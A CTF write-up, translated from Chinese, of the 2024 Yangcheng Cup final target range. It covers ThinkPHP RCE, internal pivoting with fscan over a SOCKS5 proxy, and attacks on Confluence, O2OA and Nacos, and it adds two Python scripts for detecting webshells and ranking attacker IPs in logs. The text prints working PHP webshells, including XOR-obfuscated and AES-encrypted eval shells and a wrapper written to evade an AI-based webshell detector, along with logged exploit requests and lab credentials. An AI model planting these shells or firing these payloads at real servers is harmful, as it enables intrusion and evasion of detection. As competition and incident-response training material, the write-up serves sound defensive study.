2024 "Yangcheng Cup" Guangdong-Hong Kong-Macao Greater Bay Area Cyber Security Competition Final Target Writeup
1849156050238568 · posted in Guangdong · CTF · 1334 views · 2024-09-13 00:50

Platform address: 10.1.2.10

Penetration Testing

Useful information gathered

zhaopin@yangchengsz.com

admin@yangcheng.com

Directory scanning

Directory enumeration


Webshell (trojan)

A full-port scan found an exposed ThinkPHP (tp) instance

http://10.1.143.10:35007/cmd.php

The password is 1

Hit the ThinkPHP RCE vulnerability, drop a webshell directly and connect with Godzilla

http://10.1.143.10:35007/bak.php

After gaining system privileges, the suspicious webshells found by scanning. Intranet information

/var/www/html/public/ >dir c
404.html      faq.html      index.php     router.php    team.html
about.html    favicon.ico   js        s.php     testimonial.html
bak.php       feature.html  lib       scss
contact.html  img       project.html  service.html
css       index.html    robots.txt    static

/var/www/html/public/ >cat /flag

/var/www/html/public/ >cd ..

\var\www\html/ >ls
404.html
about.html
bak.php
contact.html
css
faq.html
favicon.ico
feature.html
img
index.html
index.php
js
lib
project.html
robots.txt
router.php
s.php
scss
service.html
static
team.html
testimonial.html

\var\www\html/ >cd ..

\var\www/ >cd ..

\var/ >cd ..

\/ >dir
bin   dev  flag1  lib    media  opt   root  sbin  sys  usr
boot  etc  home   lib64  mnt    proc  run   srv   tmp  var

\/ >tac flag1
flag{e09fa9d6cc4050d8c7ac34fb6a247a2a}

\/ >cd /

/ >cd /flag

/flag/ >dir
404.html      faq.html      index.php     router.php    team.html
about.html    favicon.ico   js        s.php     testimonial.html
bak.php       feature.html  lib       scss
contact.html  img       project.html  service.html
css       index.html    robots.txt    static

/flag/ >find / -name flag*

/flag/ >tac /flag1
flag{e09fa9d6cc4050d8c7ac34fb6a247a2a}

/flag/ >ps -aux

/flag/ >cd /var/www/html

/var/www/html/ >grep -r "eval"
runtime/log/202409/1726051532-11.log:[ 2024-09-11T18:44:34+08:00 ] 192.168.54.130 10.50.143.12 GET /.mweval_history
runtime/log/202409/1726051532-11.log:[ log ] 10.1.143.10:35007/.mweval_history [运行时间:0.016985s][吞吐率:58.87req/s] [内存消耗:1,311.47kb] [文件加载:27]
runtime/log/202409/1726051532-11.log:    0 => '.mweval_history',
runtime/log/202409/1726051591-11.log:[ 2024-09-11T18:46:14+08:00 ] 192.168.54.130 10.50.143.29 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
runtime/log/202409/1726051591-11.log:[ log ] 10.1.143.10:35007/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [运行时间:0.273526s][吞吐率:3.66req/s] [内存消耗:1,312.61kb] [文件加载:27]
runtime/log/202409/1726051591-11.log:  'PHP' => 'eval-stdin.php',
runtime/log/202409/1726051591-11.log:[ 2024-09-11T18:46:15+08:00 ] 192.168.54.130 10.50.143.29 GET /comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E
runtime/log/202409/1726051591-11.log:[ log ] 10.1.143.10:35007/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E [运行时间:0.030392s][吞吐率:32.90req/s] [内存消耗:1,312.45kb] [文件加载:27]
runtime/log/202409/1726051591-11.log:    0 => '*hex/@eval($_GET[_]);?>',
runtime/log/202409/1726051730-11.log:[ 2024-09-11T18:48:03+08:00 ] 192.168.54.130 10.50.143.18 GET /.mweval_history
runtime/log/202409/1726051730-11.log:[ log ] 10.1.143.10:35007/.mweval_history [运行时间:0.720367s][吞吐率:1.39req/s] [内存消耗:1,311.47kb] [文件加载:27]
runtime/log/202409/1726051730-11.log:    0 => '.mweval_history',
runtime/log/202409/1726051730-11.log:[ 2024-09-11T18:48:06+08:00 ] 192.168.54.130 10.50.143.12 GET /%3f//?s=captcha&test=-1%20Post:%20_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=eval(%27ls%27)
runtime/log/202409/1726051730-11.log:[ log ] 10.1.143.10:35007/%3f//?s=captcha&test=-1%20Post:%20_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=eval(%27ls%27) [运行时间:0.376378s][吞吐率:2.66req/s] [内存消耗:1,318.23kb] [文件加载:27]
runtime/log/202409/1726051730-11.log:    0 => 'eval(\'ls\')',
runtime/log/202409/1726051660-11.log:[ 2024-09-11T18:46:37+08:00 ] 192.168.54.130 10.50.143.5 GET /.mweval_history
runtime/log/202409/1726051660-11.log:[ log ] 10.1.143.10:35007/.mweval_history [运行时间:0.385728s][吞吐率:2.59req/s] [内存消耗:1,311.47kb] [文件加载:27]
runtime/log/202409/1726051660-11.log:    0 => '.mweval_history',
runtime/log/202409/1726051660-11.log:  'peiqi' => '@eval(@base64_decode($_POST[\'s678798e5a716d\']));',
runtime/log/202409/11.log:[ 2024-09-11T18:52:48+08:00 ] 192.168.54.130 10.50.143.12 GET /lib/phpunit/src/Util/PHP/eval-stdin.php
runtime/log/202409/11.log:[ log ] 10.1.143.10:35007/lib/phpunit/src/Util/PHP/eval-stdin.php [运行时间:0.441600s][吞吐率:2.26req/s] [内存消耗:1,312.26kb] [文件加载:27]
runtime/log/202409/11.log:[ 2024-09-11T18:52:49+08:00 ] 192.168.54.130 10.50.143.12 GET /lib/phpunit/Util/PHP/eval-stdin.php
runtime/log/202409/11.log:[ log ] 10.1.143.10:35007/lib/phpunit/Util/PHP/eval-stdin.php [运行时间:0.589981s][吞吐率:1.69req/s] [内存消耗:1,312.27kb] [文件加载:27]
runtime/log/202409/11.log:  'PHP' => 'eval-stdin.php',
runtime/log/202409/11.log:[ 2024-09-11T18:52:49+08:00 ] 192.168.54.130 10.50.143.12 GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
runtime/log/202409/11.log:[ log ] 10.1.143.10:35007/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php [运行时间:0.610092s][吞吐率:1.64req/s] [内存消耗:1,312.66kb] [文件加载:27]
runtime/log/202409/11.log:  'PHP' => 'eval-stdin.php',
runtime/log/202409/11.log:[ 2024-09-11T18:52:49+08:00 ] 192.168.54.130 10.50.143.12 GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php
runtime/log/202409/11.log:[ log ] 10.1.143.10:35007/lib/phpunit/phpunit/Util/PHP/eval-stdin.php [运行时间:0.620653s][吞吐率:1.61req/s] [内存消耗:1,312.27kb] [文件加载:27]
public/bak.php:<?php $a="~+d()"^"!{+{}";@$b=base64_decode(${$a}["a"]);eval("".$b);?>
public/._/.shell7128_54314.php:<?php @eval($_POST[54314]);?>
public/s.php:<?php @error_reporting(0);session_start();$key="dfff0a7fa1a55c8c";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$HiC7g=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/\s+/','','base 64 _ deco de');$HiC7g=$t($HiC7g."");for($i=0;$i<strlen($HiC7g);$i++) { $new_key = $key[$i+1&15];$HiC7g[$i] = $HiC7g[$i] ^ $new_key;} }else{ $HiC7g=openssl_decrypt($HiC7g, "AES128", $key);}$arr=explode('|',$HiC7g);$func=$arr[0];$params=$arr[1];class G5vi70ip{ public function __invoke($p) {@eval("/*Za801f73rl*/".$p."");}}@call_user_func/*Za801f73rl*/(new G5vi70ip(),$params);?>
public/scss/bootstrap/scss/_functions.scss:// Utility mixins and functions for evaluating source code across our variables, maps, and mixins.
public/scss/bootstrap/scss/_functions.scss:// Used to evaluate Sass maps like our grid breakpoints.
thinkphp/library/think/view/driver/Php.php:            eval('?>' . $__content__);
thinkphp/library/think/view/driver/Php.php:            eval('?>' . $content);
thinkphp/library/think/Response.php:                $this->header['Cache-Control'] = 'max-age=' . $cache[1] . ',must-revalidate';
thinkphp/library/think/response/Redirect.php:        $this->cacheControl('no-cache,must-revalidate');
Binary file thinkphp/tests/extensions/5.4/apcu.so matches
Binary file thinkphp/tests/extensions/7.0/redis.so matches
Binary file thinkphp/tests/extensions/5.6/apcu.so matches
Binary file thinkphp/tests/extensions/5.5/apcu.so matches

/var/www/html/ >

/var/www/html/ >grep -r "eval" /
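
Added example, not code from the writeup or the challenge: a small Python scanner that applies the same eval hunt to PHP sources but also resolves the XOR-of-literals trick used by bak.php and s.php above, so the hidden `_POST` and `php://input` operands are revealed and counted. The sample files are the three shells from the grep output (s.php abbreviated to its decoding and execution path) plus a constructed benign entry file; the indicator list and threshold are my own choices.

```python
import re

# Constructed sample inputs: the three PHP files surfaced by the grep above (s.php
# abbreviated to its decoding and execution path) plus a benign ThinkPHP entry script
# as a negative case. They are inline strings so the scanner runs offline.
SAMPLES = {
    "public/bak.php":
        '<?php $a="~+d()"^"!{+{}";@$b=base64_decode(${$a}["a"]);eval("".$b);?>',
    "public/._/.shell7128_54314.php":
        '<?php @eval($_POST[54314]);?>',
    "public/s.php":
        '<?php @error_reporting(0);session_start();$key="dfff0a7fa1a55c8c";'
        "$f='file'.'_get'.'_contents';"
        "$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83)"
        ".chr(21).chr(18).chr(12).chr(9).chr(8);$HiC7g=$f($p);"
        '$HiC7g=openssl_decrypt($HiC7g, "AES128", $key);$arr=explode("|",$HiC7g);'
        'class G5vi70ip{ public function __invoke($p) {@eval("/*Za801f73rl*/".$p."");}}'
        "@call_user_func/*Za801f73rl*/(new G5vi70ip(),$arr[1]);?>",
    "public/index.php":  # constructed benign file, not from the target
        "<?php namespace think; require __DIR__ . '/../thinkphp/base.php';"
        "Container::get('app')->run()->send();",
}

# One PHP operand of a string XOR: a quoted literal or a chr(n).chr(n)... chain.
LITERAL = r'"[^"]*"' + r"|'[^']*'" + r"|chr\(\d+\)(?:\.chr\(\d+\))*"
XOR_EXPR = re.compile(rf"({LITERAL})\s*\^\s*({LITERAL})")

# Indicators a webshell usually combines. One alone is normal (eval in a template
# engine, base64_decode in a library); several in one short file are not.
INDICATORS = [
    ("eval",            re.compile(r"\beval\s*\(")),
    ("callback-exec",   re.compile(r"call_user_func\b|__invoke\b")),
    ("user-input",      re.compile(r"_(?:POST|GET|REQUEST|COOKIE)\b|php://input")),
    ("decoder",         re.compile(r"base64_decode|openssl_decrypt|gzinflate|str_rot13")),
    ("xor-obfuscation", re.compile(r"""\^\s*(?:chr\(|["'])""")),
    ("error-suppress",  re.compile(r"@\s*(?:eval|call_user_func|\$)")),
]


def literal_bytes(tok: str) -> bytes:
    """Evaluate one PHP operand: a quoted string or a chr(n).chr(n)... chain."""
    if tok.startswith("chr("):
        return bytes(int(n) & 0xFF for n in re.findall(r"chr\((\d+)\)", tok))
    return tok[1:-1].encode("latin-1")  # quoted literal; the samples use no escapes


def resolve_xor(src: str) -> list:
    """Return the plaintexts hidden in every `literal ^ literal` expression of src."""
    found = []
    for m in XOR_EXPR.finditer(src):
        a, b = literal_bytes(m.group(1)), literal_bytes(m.group(2))
        n = min(len(a), len(b))  # PHP string XOR truncates to the shorter operand
        found.append(bytes(x ^ y for x, y in zip(a[:n], b[:n])).decode("latin-1"))
    return found


def scan(name: str, src: str) -> dict:
    """Score one file: indicators present in the source plus in any XOR-hidden strings."""
    hidden = resolve_xor(src)
    text = src + "\n" + "\n".join(hidden)  # so "_POST" / "php://input" count once revealed
    hits = [label for label, rx in INDICATORS if rx.search(text)]
    return {"file": name, "score": len(hits), "hits": hits, "hidden": hidden}


def scan_all(samples: dict = SAMPLES, threshold: int = 3) -> list:
    """Return the reports whose indicator count reaches threshold, highest score first."""
    reports = [scan(name, src) for name, src in samples.items()]
    return sorted((r for r in reports if r["score"] >= threshold),
                  key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in scan_all():
        print(f"{r['file']}: score={r['score']} hits={r['hits']} hidden={r['hidden']}")
```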

AI host location

Bring out a global SOCKS5 proxy and scan the other internal subnets through it

C:\Users\86189\Desktop\羊城杯_wp>fscan_mian.exe  -socks5 10.50.143.7:6001  -h 192.168.95.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
Socks5Proxy: socks5://10.50.143.7:6001
start infoscan
192.168.95.80:80 open
192.168.95.1:80 open
192.168.95.41:80 open
192.168.95.1:22 open
192.168.95.110:8090 open
192.168.95.110:8091 open
192.168.95.100:8848 open
[*] alive ports len is: 7
start vulscan
[*] WebTitle http://192.168.95.80      code:200 len:46512  title:AI.Tech - YangCheng Artificial Intelligence
[*] WebTitle http://192.168.95.41      code:200 len:8504   title:WebShell检测产品 - 羊城数智
[*] WebTitle http://192.168.95.110:8091 code:204 len:0      title:None
[*] WebTitle http://192.168.95.100:8848 code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle http://192.168.95.1       code:200 len:30753  title:羊城数智科技有限公司 | Yangcheng Technology
[+] PocScan http://192.168.95.100:8848 poc-yaml-alibaba-nacos
[*] WebTitle http://192.168.95.110:8090 code:200 len:54428  title:羊城数智科技有限公司 - 羊城数智科技有限公司 - Confluence
[+] InfoScan http://192.168.95.110:8090 [ATLASSIAN-Confluence]
[+] PocScan http://192.168.95.80 poc-yaml-thinkphp5023-method-rce poc1

Corporate website

Confluence host

Username: admin

Password: Yangcheng@admin!@#

192.168.30.121:80 open
192.168.30.1:80 open
192.168.30.33:8080 open
192.168.30.1:22 open
192.168.30.130:80 open
192.168.30.100:8848 open
192.168.30.33:8443 open
[*] WebTitle: http://192.168.30.130     code:200 len:282    title:None
[*] WebTitle: http://192.168.30.100:8848 code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.30.33:8080 code:404 len:713    title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.30.121     code:500 len:7077   title:系统发生错误
[*] WebTitle: https://192.168.30.33:8443 code:404 len:713    title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.30.1       code:500 len:7077   title:系统发生错误
[+] http://192.168.30.100:8848 poc-yaml-alibaba-nacos

flag3

Source code audit. The backend plugin module accepts zip uploads, so we only need to modify the original plugin code

Modify the source, upload the plugin and get a shell

AI shell

An internal YCB AI sandbox detection platform is provided. I hand-wrote a class wrapper to bypass it.

<?php

class a{
    public $command_;
    public function b($command){
        eval($command);
    }
}

$cc = new a();
$cc->b($_GET['cmd']);
?>

OA

This tests the O2OA remote command execution (CVE-2022-22916); commands can be executed here. A reverse shell is needed

URL: 192.168.30.130
Username: xadmin
Password: o2@YC#2024
Note: descriptions of special workflows in the OA system, shortcuts to commonly used functions, etc.

flag4

Write an in-memory webshell into Confluence and get flag4

flag12

After the proxy tunnel is up, attack the internal Nacos host through it

Reverse shell; this took quite a few attempts. There are restrictions on the inside

Incident Response

Incident response 1 - IP

Obtain access to the corporate website host and do incident response on the inside

The malicious attacker IP found
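
Added example, not part of the original writeup: a Python parser for the ThinkPHP runtime log records shown in the grep output above that tags each request with the attack signature it carries (eval calls, the TP5 `_method=__construct` override with `filter[]=call_user_func`, phpunit eval-stdin probes, dot-file probes) and ranks client IPs by suspicious-request count, which is how the attacker IP for this task can be pulled from the logs. It assumes the first IP in each record is the client address; the benign request, the signature names and the threshold are constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample: request records copied from the ThinkPHP runtime log lines in the
# grep output above (log file name stripped), one constructed benign request, and one
# "[ log ]" timing record to show what the parser skips.
LOG_LINES = [
    "[ 2024-09-11T18:44:34+08:00 ] 192.168.54.130 10.50.143.12 GET /.mweval_history",
    "[ 2024-09-11T18:46:14+08:00 ] 192.168.54.130 10.50.143.29 POST "
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "[ 2024-09-11T18:46:15+08:00 ] 192.168.54.130 10.50.143.29 GET "
    "/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E",
    "[ 2024-09-11T18:48:06+08:00 ] 192.168.54.130 10.50.143.12 GET "
    "/%3f//?s=captcha&test=-1%20Post:%20_method=__ConStruct&method=get"
    "&filter[]=call_user_func&get[0]=eval(%27ls%27)",
    "[ 2024-09-11T18:52:48+08:00 ] 192.168.54.130 10.50.143.12 GET "
    "/lib/phpunit/src/Util/PHP/eval-stdin.php",
    # constructed benign request, not from the target
    "[ 2024-09-11T18:50:00+08:00 ] 10.50.143.99 10.50.143.12 GET /index.php/about.html",
    # timing record from the same log; it is not a request and must be skipped
    "[ log ] 10.1.143.10:35007/.mweval_history [运行时间:0.016985s][吞吐率:58.87req/s]",
]

# Record layout assumed here: "[ timestamp ] client_ip second_ip METHOD path".
RECORD = re.compile(
    r"^\[ (?P<ts>\S+) \] (?P<client>\d{1,3}(?:\.\d{1,3}){3}) (?P<second>\S+) "
    r"(?P<method>[A-Z]+) (?P<path>\S+)$"
)

# Signatures are matched against the URL-decoded path, so %27 / %3B encoding of the
# payload does not hide it.
SIGNATURES = [
    ("eval-call",           re.compile(r"eval\s*\(", re.I)),
    ("tp5-method-override", re.compile(r"_method=__construct", re.I)),
    ("tp5-filter-callback", re.compile(r"filter\[\]=(?:call_user_func|system|assert)", re.I)),
    ("phpunit-eval-stdin",  re.compile(r"eval-stdin\.php", re.I)),
    ("dotfile-probe",       re.compile(r"^/\.[^/]+$")),
]


def parse_record(line: str):
    """Parse one request record; returns None for lines that are not requests."""
    m = RECORD.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = unquote(rec["path"])
    rec["tags"] = [name for name, rx in SIGNATURES if rx.search(rec["decoded_path"])]
    return rec


def analyze(lines) -> dict:
    """Per client IP: total requests, suspicious requests, and which signatures fired."""
    stats = defaultdict(lambda: {"requests": 0, "suspicious": 0, "tags": Counter()})
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        s = stats[rec["client"]]
        s["requests"] += 1
        if rec["tags"]:
            s["suspicious"] += 1
            s["tags"].update(rec["tags"])
    return dict(stats)


def top_attacker(lines):
    """Client IP with the most suspicious requests (ties broken by request volume)."""
    stats = analyze(lines)
    if not stats:
        return None
    return max(stats, key=lambda ip: (stats[ip]["suspicious"], stats[ip]["requests"]))


if __name__ == "__main__":
    for ip, s in sorted(analyze(LOG_LINES).items(), key=lambda kv: -kv[1]["suspicious"]):
        print(f"{ip}: {s['suspicious']}/{s['requests']} suspicious, tags={dict(s['tags'])}")
    print("top attacker:", top_attacker(LOG_LINES))
```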

Incident response 2 - webshell

.shell7128_54314.php

public/._/.shell7128_54314.php:<?php @eval($_POST[54314]);?>

Incident response 3 - ip:port

Malicious traffic from the internal host

192.168.18.29:19005
